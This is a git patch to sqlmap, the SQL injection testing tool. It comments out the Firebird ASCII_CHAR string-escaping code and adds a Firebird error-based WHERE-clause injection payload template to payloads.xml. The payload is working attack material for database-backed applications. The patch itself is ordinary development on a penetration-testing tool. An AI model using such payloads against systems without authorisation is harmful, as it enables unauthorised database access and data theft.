From bf09b8a6d98e240f901d6ad493b5b3f94215164e Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 2 Dec 2010 15:09:21 +0000
Subject: [PATCH] added Firebird error based (WHERE) attack vector

---
 plugins/dbms/firebird/syntax.py | 78 +++++++++++++++++----------------
 xml/payloads.xml                | 21 ++++++++-
 2 files changed, 61 insertions(+), 38 deletions(-)

diff --git a/plugins/dbms/firebird/syntax.py b/plugins/dbms/firebird/syntax.py
index c489c78df..eccabf456 100644
--- a/plugins/dbms/firebird/syntax.py
+++ b/plugins/dbms/firebird/syntax.py
@@ -15,59 +15,63 @@ class Syntax(GenericSyntax):
     def __init__(self):
         GenericSyntax.__init__(self)
 
+    # As ASCII_CHAR is only available from v2.1 we'll need to adapt this one to use the
+    # commented-out part only if detected version>=2.1
+    # Reference: wiki.firebirdsql.org/wiki/index.php?page=ASCII_CHAR
+
     @staticmethod
     def unescape(expression, quote=True):
-        if quote:
-            while True:
-                index = expression.find("'")
-                if index == -1:
-                    break
+        #if quote:
+            #while True:
+                #index = expression.find("'")
+                #if index == -1:
+                    #break
 
-                firstIndex = index + 1
-                index = expression[firstIndex:].find("'")
+                #firstIndex = index + 1
+                #index = expression[firstIndex:].find("'")
 
-                if index == -1:
-                    raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
+                #if index == -1:
+                    #raise sqlmapSyntaxException, "Unenclosed ' in '%s'" % expression
 
-                lastIndex = firstIndex + index
-                old = "'%s'" % expression[firstIndex:lastIndex]
-                unescaped = ""
+                #lastIndex = firstIndex + index
+                #old = "'%s'" % expression[firstIndex:lastIndex]
+                #unescaped = ""
 
-                for i in range(firstIndex, lastIndex):
-                    unescaped += "ASCII_CHAR(%d)" % (ord(expression[i]))
-                    if i < lastIndex - 1:
-                        unescaped += "||"
+                #for i in range(firstIndex, lastIndex):
+                    #unescaped += "ASCII_CHAR(%d)" % (ord(expression[i]))
+                    #if i < lastIndex - 1:
+                        #unescaped += "||"
 
-                expression = expression.replace(old, unescaped)
-        else:
-            unescaped = "".join("ASCII_CHAR(%d)||" % ord(c) for c in expression)
-            if unescaped[-1] == "||":
-                unescaped = unescaped[:-1]
+                #expression = expression.replace(old, unescaped)
+        #else:
+            #unescaped = "".join("ASCII_CHAR(%d)||" % ord(c) for c in expression)
+            #if unescaped[-1] == "||":
+                #unescaped = unescaped[:-1]
 
-            expression = unescaped
+            #expression = unescaped
 
         return expression
 
     @staticmethod
     def escape(expression):
-        while True:
-            index = expression.find("ASCII_CHAR(")
-            if index == -1:
-                break
+        #while True:
+            #index = expression.find("ASCII_CHAR(")
+            #if index == -1:
+                #break
 
-            firstIndex = index
-            index = expression[firstIndex:].find(")")
+            #firstIndex = index
+            #index = expression[firstIndex:].find(")")
 
-            if index == -1:
-                raise sqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
+            #if index == -1:
+                #raise sqlmapSyntaxException, "Unenclosed ) in '%s'" % expression
 
-            lastIndex = firstIndex + index + 1
-            old = expression[firstIndex:lastIndex]
-            oldUpper = old.upper()
-            oldUpper = oldUpper.lstrip("ASCII_CHAR(").rstrip(")")
-            oldUpper = oldUpper.split("||")
+            #lastIndex = firstIndex + index + 1
+            #old = expression[firstIndex:lastIndex]
+            #oldUpper = old.upper()
+            #oldUpper = oldUpper.lstrip("ASCII_CHAR(").rstrip(")")
+            #oldUpper = oldUpper.split("||")
 
-            escaped = "'%s'" % "".join([chr(int(char)) for char in oldUpper])
-            expression = expression.replace(old, escaped).replace("'||'", "")
+            #escaped = "'%s'" % "".join([chr(int(char)) for char in oldUpper])
+            #expression = expression.replace(old, escaped).replace("'||'", "")
 
         return expression
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 8902fae7f..e28516a41 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -704,9 +704,28 @@ Formats:
             <dbms>Oracle</dbms>
         </details>
     </test>
+
+    <test>
+        <title>Firebird error-based - WHERE clause</title>
+        <stype>2</stype>
+        <level>1</level>
+        <risk>0</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <epayload>AND [RANDNUM]=('[DELIMITER_START]'||%s||'[DELIMITER_STOP]')</epayload>
+        <request>
+            <payload>AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+        </details>
+    </test>
     <!--
          TODO: if possible, add payload for SQLite, Microsoft Access,
-         Firebird and SAP MaxDB - no known techniques at this time
+         and SAP MaxDB - no known techniques at this time
     -->
     <!-- End of error-based tests - WHERE clause -->